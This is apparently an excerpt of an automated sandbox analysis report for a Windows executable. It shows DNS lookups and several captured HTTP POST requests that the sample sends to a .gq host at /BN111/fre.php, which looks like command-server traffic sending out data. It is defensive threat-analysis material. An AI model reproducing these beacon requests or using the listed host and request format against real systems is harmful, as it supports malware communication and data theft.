                      Oct 14, 2021 08:29:23.396900892 CEST8.8.8.8192.168.2.60x4036No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:27.445975065 CEST8.8.8.8192.168.2.60x9f87No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:27.445975065 CEST8.8.8.8192.168.2.60x9f87No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:29.624861002 CEST8.8.8.8192.168.2.60xf256No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:29.624861002 CEST8.8.8.8192.168.2.60xf256No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:31.713087082 CEST8.8.8.8192.168.2.60xb97aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:31.713087082 CEST8.8.8.8192.168.2.60xb97aNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:32.984905005 CEST8.8.8.8192.168.2.60xe4c9No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:32.984905005 CEST8.8.8.8192.168.2.60xe4c9No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:35.243751049 CEST8.8.8.8192.168.2.60x3787No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:35.243751049 CEST8.8.8.8192.168.2.60x3787No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:36.947783947 CEST8.8.8.8192.168.2.60x493No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:36.947783947 CEST8.8.8.8192.168.2.60x493No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:38.117574930 CEST8.8.8.8192.168.2.60x3e93No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:38.117574930 CEST8.8.8.8192.168.2.60x3e93No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:39.349596024 CEST8.8.8.8192.168.2.60x6c70No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:39.349596024 CEST8.8.8.8192.168.2.60x6c70No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:40.681256056 CEST8.8.8.8192.168.2.60x37c8No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:40.681256056 CEST8.8.8.8192.168.2.60x37c8No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:41.851002932 CEST8.8.8.8192.168.2.60x82b7No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:41.851002932 CEST8.8.8.8192.168.2.60x82b7No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:43.256962061 CEST8.8.8.8192.168.2.60xed11No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:43.256962061 CEST8.8.8.8192.168.2.60xed11No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:44.406697989 CEST8.8.8.8192.168.2.60xcc0dNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:44.406697989 CEST8.8.8.8192.168.2.60xcc0dNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:45.741152048 CEST8.8.8.8192.168.2.60x5ccfNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:45.741152048 CEST8.8.8.8192.168.2.60x5ccfNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:46.900079012 CEST8.8.8.8192.168.2.60x83fNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:46.900079012 CEST8.8.8.8192.168.2.60x83fNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:48.029814005 CEST8.8.8.8192.168.2.60x69c5No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:48.029814005 CEST8.8.8.8192.168.2.60x69c5No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:49.299062967 CEST8.8.8.8192.168.2.60x6449No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:49.299062967 CEST8.8.8.8192.168.2.60x6449No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:51.858999968 CEST8.8.8.8192.168.2.60x6899No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:51.858999968 CEST8.8.8.8192.168.2.60x6899No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:55.815201998 CEST8.8.8.8192.168.2.60xdfe6No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:55.815201998 CEST8.8.8.8192.168.2.60xdfe6No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:56.942806959 CEST8.8.8.8192.168.2.60xdd17No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:56.942806959 CEST8.8.8.8192.168.2.60xdd17No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:58.047533989 CEST8.8.8.8192.168.2.60xb23No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:58.047533989 CEST8.8.8.8192.168.2.60xb23No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:59.205523968 CEST8.8.8.8192.168.2.60x4332No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:29:59.205523968 CEST8.8.8.8192.168.2.60x4332No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:00.285648108 CEST8.8.8.8192.168.2.60x4eNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:00.285648108 CEST8.8.8.8192.168.2.60x4eNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:01.393187046 CEST8.8.8.8192.168.2.60xbb96No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:01.393187046 CEST8.8.8.8192.168.2.60xbb96No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:02.525789976 CEST8.8.8.8192.168.2.60x9297No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:02.525789976 CEST8.8.8.8192.168.2.60x9297No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:03.674351931 CEST8.8.8.8192.168.2.60x202fNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:03.674351931 CEST8.8.8.8192.168.2.60x202fNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:04.856111050 CEST8.8.8.8192.168.2.60x89b0No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:04.856111050 CEST8.8.8.8192.168.2.60x89b0No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:05.935167074 CEST8.8.8.8192.168.2.60xe22dNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:05.935167074 CEST8.8.8.8192.168.2.60xe22dNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:07.119254112 CEST8.8.8.8192.168.2.60x1524No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:07.119254112 CEST8.8.8.8192.168.2.60x1524No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:08.415246964 CEST8.8.8.8192.168.2.60x1ae7No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:08.415246964 CEST8.8.8.8192.168.2.60x1ae7No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:09.670599937 CEST8.8.8.8192.168.2.60xbc15No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:09.670599937 CEST8.8.8.8192.168.2.60xbc15No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:11.109034061 CEST8.8.8.8192.168.2.60xdd1No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:11.109034061 CEST8.8.8.8192.168.2.60xdd1No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:12.891690969 CEST8.8.8.8192.168.2.60x11e2No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:12.891690969 CEST8.8.8.8192.168.2.60x11e2No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:15.314672947 CEST8.8.8.8192.168.2.60x9ccNo error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:15.314672947 CEST8.8.8.8192.168.2.60x9ccNo error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:16.658160925 CEST8.8.8.8192.168.2.60x2770No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:16.658160925 CEST8.8.8.8192.168.2.60x2770No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:18.291595936 CEST8.8.8.8192.168.2.60x6e34No error (0)74f26d34ffff049368a6cff8812f86ee.gq172.67.219.104A (IP address)IN (0x0001)
                      Oct 14, 2021 08:30:18.291595936 CEST8.8.8.8192.168.2.60x6e34No error (0)74f26d34ffff049368a6cff8812f86ee.gq104.21.62.32A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • 74f26d34ffff049368a6cff8812f86ee.gq

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.649779172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:19.047157049 CEST1054OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 196
                      Connection: close
                      Oct 14, 2021 08:28:19.209945917 CEST1055INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tc%2BH09Yr5HaypHMlBF4iUDG3nhys2pPE4zSX4LGjecWNJzGpM%2B99gDFRrUNEMRf3eoe2rHO1C%2BujLeyZYYPL6AvWl4cI4PR4ssIE72e%2BnJtPmjJiBKaVLXSCw8d0%2BL7Ql8nO18QK89ttl7gsAcZIK9ns5%2B1G5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf331c2f691f-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.649780172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:20.347126961 CEST1056OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 196
                      Connection: close
                      Oct 14, 2021 08:28:20.460792065 CEST1057INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hQkFe3UJ1QmCzUsZUQlHGGa3jv5VhF59kyHL%2FAsWX3Cle1Hp0JGwG2RiPxylz6fXh7eYHqVnm1Viov8%2Fg8G0zh1TwiCsMn%2BxPOnxpZErkhdqFG1ph3AcJYoYgnYYS96tyPBQDWnFXqoyO4YpwFfZSNVBuZc%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf3b3ba57057-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      10192.168.2.649789172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:32.511259079 CEST1074OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:32.680007935 CEST1075INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PsyKz23oumG1N2Qa6W82cL6U9NuCNhNUuC%2FZVgvvwW%2BDV3gzbbFfzB3%2BNtArLcKJk6RAdkcWIb70IWH9c1BU5tnjxYGlq1KaEkpgcFVk3A%2FjDdAOS0gYz6ayeBdJqQBA9VqH4EPLTxPN245tSgs%2BJ6qZbgIytw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf873cad5c62-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      11192.168.2.649790104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:33.672461987 CEST1076OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:33.830368042 CEST1077INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H68GrAIUZ61ik30eQPT7ieOnffpsCaIqd%2B20QY25W3jNlrWDPyTlhkKHRfJS%2FiUtwct9SjTEfhD8iO%2B5yucBGT673jWQTRVTfa6kc7%2Fx89CXhw5%2Fm91Iu3OgHm5JHlTRSAOWIMlJ6872pwxceJSRHYfcODJ2aQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf8e7a2f2b65-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      12192.168.2.649791172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:34.890356064 CEST1078OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:35.044509888 CEST1079INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uZ0sVZ19FquxOnQnQ8eV27mBYy1WgM0CUPb1NNnWMJzxc3043xzagNkBokq638MVdi87wkRVwA%2FaDhBllVz6Wa7tU%2BXqwhXPidoHFsE7wvUTdAVBYElnVusQQa8dyaLYa2RuJ8MO2LY4BrfzJZWgJLGhDagHvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf9619e27025-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      13192.168.2.649792172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:35.993002892 CEST1080OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:36.144937992 CEST1081INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cfaTZhkdZ%2B4BJCg2NEEt3iB1wdphtOW7vYogkgF6ssnB0JtOYVEcfiVEntxnGT8GGYD49JE7n6oNLeWj%2BaC3dp6n%2FnvCW6Yfyv6vLBoDeaIyz7FL%2BFkuxcREOUryCFN7LVICmGTi487rSg3JKSZqNWUkm5jFTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf9cfa384a85-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      14192.168.2.649793104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:37.119939089 CEST1082OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:37.232311010 CEST1083INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Yx4q2GcB87W4VIt%2F6Bl3361rtQSoUi34qsv3Q1MEZfb%2BSUNJrztSsb%2BJ14kBZzFEMs0Tkh%2F8iKsclQJnJlu7SyIBt6Rz6eoZ8nTufwUUBVTn4sWWS4kQt51roLWM4G0PcAOACqu4oY8Th1%2B801eD8ZrqSMLkmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfa408094e97-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      15192.168.2.649794172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:38.386394024 CEST1084OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:38.540837049 CEST1085INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Pn8lTUVtVtKkV%2B9%2FhI5pH%2Bbv3JxxkgBA0SYiWdJIlkIQKZcw5zH1I8kAF6QAJOIRQjkM%2BOmDifl0B6xVMTePviWGDxi0zLdm1s%2FnLGulx3kj4q8F2zNoVyQpgtSXW0TCRUbCOKrT9TH7mteyHIsbeqJURSgUUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfabfe766933-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      16192.168.2.649795172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:39.512557030 CEST1086OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:39.669177055 CEST1088INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fbYEyM1Gh6WdAzvjkUrxUJ61%2BI86%2FMQWYOt736TgF8PYXX4xRDCoMqDGqnuxaI5J8NZQWEAAFQmX57qs%2BjEX9BOBANnKvqJQwuiSDuZUH%2FmkItpnH6MouMDIgY94Ubkv2Xr%2FP6LV0udfFhbt0DzGN4dYvRJYjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debfb2ffc45bdd-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      17192.168.2.649798172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:41.105942011 CEST1107OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:41.219671965 CEST1108INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tnOYS6v1%2BDryLySE0XRA3DanDggqIU5lD1efwHzLdufMHOXHG4q7dfhWoqlzoX5wDgi%2BczRB82cB78sgINYZ70528recLHfPp2P6sSiGDKYiKmOnVIaMSw3%2FJ%2FTVZtL%2FZnQlEs8dl3y5rZsfxnVPclRPmHDLkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
